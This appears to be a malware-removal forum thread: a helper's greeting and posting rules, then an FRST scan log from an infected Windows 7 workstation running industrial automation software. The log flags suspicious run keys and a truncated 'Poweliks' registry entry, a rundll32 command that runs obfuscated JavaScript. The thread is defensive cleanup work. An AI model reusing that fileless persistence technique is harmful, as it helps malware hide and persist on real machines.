
Malicious Website Blocked - C:\Windows\SysWOW64\dllhost.exe



Hello MarkL123 and welcome! My name is Borislav and I will be glad to help you solve your malware problem.

Please note:

  • If you are a paying customer, you have the privilege to contact the help desk at Consumer Support. If you choose this option to get help, please let me know.
  • I recommend that you keep the instructions I will be giving you so that they are available to you at any time. You can save them in a text file or print them.
  • Make sure you read all of the instructions and fixes thoroughly before continuing with them.
  • Follow my instructions strictly and don’t hesitate to stop and ask me if you have any questions.
  • Post your log files, don't attach them. Every log file should be copy/pasted in your next reply.
  • Do not perform any kind of scanning and fixing without my instructions. If you want to proceed on your own, please let me know.

P2P/Piracy Warning:

If you're using Peer 2 Peer software such as BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here.

Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.

If you have illegal/cracked software, cracks, keygens etc. on the system, please remove or uninstall them now and read the policy on Piracy.


FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014

Ran by Mark (administrator) on MININT-LA7T7PK on 05-11-2014 16:33:50

Running from C:\Users\Mark\Desktop

Loaded Profile: Mark (Available profiles: Mark)

Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)

Internet Explorer Version 11

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(AMD) C:\Windows\System32\atieclxx.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSView Enterprise\TagSrv.exe

(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe

(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\EventServer.exe

(Acresso Software Inc.) C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSOPC Gateway\RSOPCGateway.exe

(Acresso Software Inc.) C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe

(Tanuki Software, Ltd.) C:\Program Files\Inductive Automation\Ignition\IgnitionGateway.exe

(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\flexsvr.exe

(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.FTVIEWX64TAGDB\MSSQL\Binn\sqlservr.exe

(Oracle Corporation) C:\Program Files\Java\jre1.8.0_20\bin\java.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\NmspHost.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\RdcyHost.exe

(Rockwell Automation Inc.) C:\Program Files (x86)\Common Files\Rockwell\RNADiagnosticsSrv.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSView Enterprise\HMIDIAGNOSTICSLSTADAPT.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSLinx Enterprise\RSLinxNG.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\RsvcHost.exe

(SonicWALL Inc.) C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEService64.exe

(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe

(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe

(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe

(Intel Corporation) C:\Windows\System32\igfxtray.exe

(Intel Corporation) C:\Windows\System32\hkcmd.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(TheGreenBow) C:\Program Files (x86)\TheGreenBow\TheGreenBow VPN\vpnconf.exe

(SonicWALL Inc.) C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEGui.exe

(GlavSoft LLC.) C:\Program Files\TightVNC\tvnserver.exe

(SugarSync, Inc.) C:\Program Files (x86)\SugarSync\SugarSyncManager.exe

(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_IATILQE.EXE

(Microsoft Corporation) C:\Windows\System32\regsvr32.exe

(Dell) C:\Users\Mark\AppData\Local\Apps\2.0\50CAB00K.WMW\2TWBM7VC.CKO\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exe

(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe

() C:\Program Files (x86)\PST\Binaries\RACurrTray.exe

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe

(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe

(cyberlink) C:\Program Files (x86)\CyberLink\Shared files\brs.exe

() C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Automation\UsbCipDriver\UsbCipHelper\UsbCipHelper.exe

(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe

(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe

(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

(TheGreenBow) C:\Windows\SysWOW64\TgbStarter.exe

(GlavSoft LLC.) C:\Program Files\TightVNC\tvnserver.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe

(TheGreenBow) C:\Program Files (x86)\TheGreenBow\TheGreenBow VPN\tgbike.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\TscHelp.exe

(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\SnagPriv.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\EventClientMultiplexer.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\Tools\FTActivationBoost.exe

(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\SnagitEditor.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\RnaDirServer.exe

(Microsoft Corporation) C:\Windows\splwow64.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe

() C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\RNADirMultiplexor.exe

(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe

(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

(O2Micro International) C:\Windows\System32\drivers\o2flash.exe

(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSCommon\RSOBSERV.EXE

(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [698712 2013-02-21] (Alps Electric Co., Ltd.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7174728 2013-04-09] (Realtek Semiconductor)

HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1291848 2013-03-22] (Realtek Semiconductor)

HKLM\...\Run: [WavesSvc] => C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe [114456 2013-02-28] (Waves Audio Ltd.)

HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1291848 2013-03-22] (Realtek Semiconductor)

HKLM\...\Run: [iAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)

HKLM\...\Run: [TgbVpn] => C:\Program Files (x86)\TheGreenBow\TheGreenBow VPN\vpnconf.exe [649904 2011-11-15] (TheGreenBow)

HKLM\...\Run: [sonicWALLNetExtender] => C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEGui.exe [1103744 2010-06-22] (SonicWALL Inc.)

HKLM\...\Run: [tvncontrol] => C:\Program Files\TightVNC\tvnserver.exe [2179056 2013-07-19] (GlavSoft LLC.)

HKLM-x32\...\Run: [RemoteControl9] => C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2010-10-01] (CyberLink Corp.)

HKLM-x32\...\Run: [PDVD9LanguageShortcut] => C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-09-17] (CyberLink Corp.)

HKLM-x32\...\Run: [bDRegion] => C:\Program Files (x86)\Cyberlink\Shared Files\brs.exe [75048 2011-08-11] (cyberlink)

HKLM-x32\...\Run: [] => [X]

HKLM-x32\...\Run: [RoxWatchTray] => C:\Program Files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe [240112 2010-11-25] (Sonic Solutions)

HKLM-x32\...\Run: [Desktop Disc Tool] => C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe [514544 2010-11-17] ()

HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2011-01-30] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [Dell Webcam Central] => C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [409744 2009-06-24] (Creative Technology Ltd)

HKLM-x32\...\Run: [usbCipHelper] => C:\Program Files (x86)\Rockwell Automation\UsbCipDriver\UsbCipHelper\UsbCipHelper.exe [434176 2011-10-18] (Rockwell Automation, Inc.)

HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1058880 2013-03-28] (SEIKO EPSON CORPORATION)

HKLM-x32\...\Run: [sBRegRebootCleaner] => C:\Program Files (x86)\Sunbelt Software\VIPRE\SBRC.exe

HKLM-x32\...\Run: [vmware-tray.exe] => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe [112856 2014-06-12] (VMware, Inc.)

HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [507776 2014-07-30] (Oracle Corporation)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-10-24] (Apple Inc.)

Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [sugarSync] => C:\Program Files (x86)\SugarSync\SugarSyncManager.exe [11241824 2014-01-24] (SugarSync, Inc.)

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATILQE.EXE [297024 2013-01-24] (SEIKO EPSON CORPORATION)

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [383d10] => C:\383d109\383d109.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [383d109] => C:\Users\Mark\AppData\Roaming\383d109.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [YnPack] => C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YnPack\usejdwp.exe <===== ATTENTION

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [YWPack] => regsvr32.exe C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack\cygmapMod54.dll <===== ATTENTION

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [DellSystemDetect] => C:\Users\Mark\AppData\Local\Apps\2.0\50CAB00K.WMW\2TWBM7VC.CKO\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exe [254976 2014-04-30] (Dell)

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\MountPoints2: {86727316-c957-11e3-86f6-534e57000000} - F:\VZW_Software_upgrade_assistant.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RACurrTray.lnk

ShortcutTarget: RACurrTray.lnk -> C:\Program Files (x86)\PST\Binaries\RACurrTray.exe ()

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snagit 11.lnk

ShortcutTarget: Snagit 11.lnk -> C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe (TechSmith Corporation)

ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll (Autodesk, Inc.)

ShellIconOverlayIdentifiers: [sugarSyncBackedUp] -> {0C4A258A-3F3B-4FFF-80A7-9B3BEC139472} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll (SugarSync, Inc.)

ShellIconOverlayIdentifiers: [sugarSyncPending] -> {62CCD8E3-9C21-41E1-B55E-1E26DFC68511} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll (SugarSync, Inc.)

ShellIconOverlayIdentifiers: [sugarSyncRoot] -> {A759AFF6-5851-457D-A540-F4ECED148351} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll (SugarSync, Inc.)

ShellIconOverlayIdentifiers: [sugarSyncShared] -> {1574C9EF-7D58-488F-B358-8B78C1538F51} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll (SugarSync, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

URLSearchHook: HKCU - (No Name) - {4c60e5ab-5c68-4c59-abaa-885010b24b32} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll No File

BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll No File

BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_20\bin\ssv.dll (Oracle Corporation)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_20\bin\jp2ssv.dll (Oracle Corporation)

BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)

BHO-x32: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg32.dll No File

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll No File

DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab

DPF: HKLM-x32 {73888E2B-FF04-416C-8847-984D7FC4507F} http://192.168.13.248/RtspVaPgDecNew2.cab

DPF: HKLM-x32 {91B29AFF-E4FF-11D6-8C88-00A0C9D7BBEB} http://www.ab.com/support/abdrives/webupdate/RADriveWebUpdate.cab

DPF: HKLM-x32 {E19E79EC-F62E-40A0-952D-E49AEC7BEC2F} http://192.168.0.100/control/nvA1Media.cab

DPF: HKLM-x32 {FFAD8DA9-ED41-494D-AC8E-63D861D0A733} https://download.rockwellautomation.com/plugins/rockwell.cab

Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll No File

Handler-x32: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg32.dll No File

Tcpip\Parameters: [DhcpNameServer] 24.116.0.53 24.116.2.50

FireFox:
========

FF Plugin: @java.com/DTPlugin,version=11.20.2 -> C:\Program Files\Java\jre1.8.0_20\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF Plugin: @java.com/JavaPlugin,version=11.20.2 -> C:\Program Files\Java\jre1.8.0_20\bin\plugin2\npjp2.dll (Oracle Corporation)

FF Plugin: @microsoft.com/GENUINE -> disabled No File

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)

FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @nosltd.com/getPlus+®,version=2.0.7.35 -> C:\Program Files (x86)\NOS\bin\nprockwell.dll (NOS Microsystems Ltd.)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @vmware.com/vmrc,version=5.5.0.00000 -> C:\Program Files (x86)\Common Files\VMware\VMware Remote Console Plug-in 5.5\Firefox\np-vmware-vmrc.dll (VMware, Inc.)

FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Mark\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)

FF Plugin HKCU: @jazz-soft.com/JazzPlugin -> C:\Program Files (x86)\Jazz-Soft\Jazz-Plugin\npJazz.dll (Jazz-Soft)

FF Plugin HKCU: LWAPlugin15.8 -> C:\Users\Mark\AppData\Roaming\Mozilla\Plugins\npLWAPlugin15.8.dll (Microsoft Corporation)

FF Plugin ProgramFiles/Appdata: C:\Users\Mark\AppData\Roaming\mozilla\plugins\npLWAPlugin15.8.dll (Microsoft Corporation)

FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension

Chrome:
=======

CHR Profile: C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Docs) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-04-29]

CHR Extension: (Google Drive) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-04-29]

CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-30]

CHR Extension: (YouTube) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-04-29]

CHR Extension: (Google Search) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-04-29]

CHR Extension: (Google Wallet) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-29]

CHR Extension: (Gmail) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-04-29]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 1784-PCIDS DeviceNet; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\PcidsService.exe [109568 2012-06-05] (Rockwell Automation) [File not signed]

S2 CLKMSVC10_9EC60124; C:\Program Files (x86)\CyberLink\PowerDVD9\NavFilter\kmsvc.exe [248304 2011-08-11] (CyberLink)

S3 EmuLogix 5868 Slot0; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot1; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot10; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot11; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot12; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot13; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot14; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot15; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot16; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot2; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot3; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot4; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot5; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot6; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot7; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot8; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot9; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-16] (Seiko Epson Corporation)

R2 FactoryTalk Activation Service; C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe [1122568 2010-05-17] (Acresso Software Inc.)

R2 FactoryTalk Gateway; C:\Program Files (x86)\Rockwell Software\RSOPC Gateway\RSOPCGateway.exe [588136 2011-11-18] (Rockwell Automation, Inc.)

R2 FTActivationBoost; C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\Tools\FTActivationBoost.exe [144744 2011-11-14] (Rockwell Automation, Inc.)

R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)

S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]

R2 Ignition; C:\Program Files\Inductive Automation\Ignition\IgnitionGateway.exe [630552 2014-07-15] (Tanuki Software, Ltd.) [File not signed]

